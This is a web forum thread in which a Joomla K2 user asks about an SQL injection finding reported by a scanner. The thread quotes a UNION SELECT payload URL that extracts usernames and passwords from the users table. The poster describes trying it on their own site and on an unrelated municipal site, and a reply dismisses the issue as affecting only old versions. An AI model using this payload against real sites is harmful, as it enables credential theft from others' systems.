Hello, the K2 team. Thank you for the extension, I love it a lot.
I have a little concern about the safety of this extension,
after the tests of vulnerability with "Backtrack" be the score shows that the extension has a sql injection vulnerability, I think it's about the first version of 52?

here is the message:

19 # 16
Info -> Component: com_k2 (sectionid) SQL Injection Vulnerability
Versions Effected: 1.0.1 Beta <=
Check: / components/com_k2 /
Exploit: / index.php? Com_k2 option = & view = category & itemlist = null 'and 1 = 2 union select 1, concat (username, 0x3a, password), 3,4,5,6,7,8,9,10,11, usertype from jos_users Where 12,13,14 0x53757065722041646d696e6973747261746f72 = -
Vulnerable? No

this is what sql injection for the latest version 2.6.6 of k2?

Another thing, I tried to inject this code in my site for testing:

mysite.com / index.php? com_k2 option = & view = category & itemlist = null 'and 1 = 2 union select 1, concat (username, 0x3a, password), 3,4,5,6,7,8,9,10,11 , 12,13,14 usertype from jos_users Where 0x53757065722041646d696e6973747261746f72 = -


the Result


a large page with multiple items k2????? this is not normal right?


Another time my friends, I also tried this code in a site that uses k2 (city-adm.lviv.ua/)
the site gave me a 404 error page!!


how I can add this error page to redirect links sql type attacks.

thank you, I need your help, before the launch of my site

Hello,

Versions Effected: 1.0.1 Beta is a long long time ago. No need to worry about any new versions of K2.

As far as the redirects you can use the redirect plugin. Components => redirect.

I work with version 2.6.6, I just wanted to test the site before launch,
frenchement K2 is safe, by experience I've received several attempts to hack component k2, but nobody succeeded :)

except once QLQ injections comments, but I solved the problem

some site was hacked and change all password to Admin or win32conficker
(my sites using: K2 2.6.6 with disable comments & New Show Pro GK4 only)